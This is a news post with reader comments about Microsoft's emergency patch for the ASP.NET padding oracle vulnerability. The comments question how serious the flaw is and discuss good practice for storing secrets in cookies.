Microsoft To Release Emergency Fix For ASP.NET Bug

Trailrunner7 writes "Microsoft on Tuesday will release an emergency out-of-band patch for the ASP.NET padding oracle attack that was disclosed earlier this month. The patch will only be available on the company's Download Center for the time being, however. The company is taking the step of releasing an emergency fix for the bug because of the seriousness of the vulnerability — which potentially affects millions of Web applications — and the fact that there are attacks ongoing against it already. The patch will fix the flaw in all versions of the .NET framework. Although Microsoft issued guidance about workarounds to defend against attacks on the ASP.NET bug shortly after it was publicly disclosed, the researchers, Juliano Rizzo and Thai Duong, said that the workarounds did not fully protect users against their attack."

How serious is this really?

[TheLink]

Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config.

Why would decrypting a cookie allow you to read data from files on the target server?

What if you just use cookies for storing session ids?

Using cookies to store lots of secrets seems like a stupid idea to me. Server-side secrets belong server-side.

Furthermore what if the user wants to use more than one browser window? If you are too reliant on cookies to store state it means the webapp would get confused in that scenario.

Re:That Bogus Feeling

The only thing that is bogus is all the FOSS propaganda that you are spreading.

Interesting side note: The captcha /. wants me to type out says "idiotic"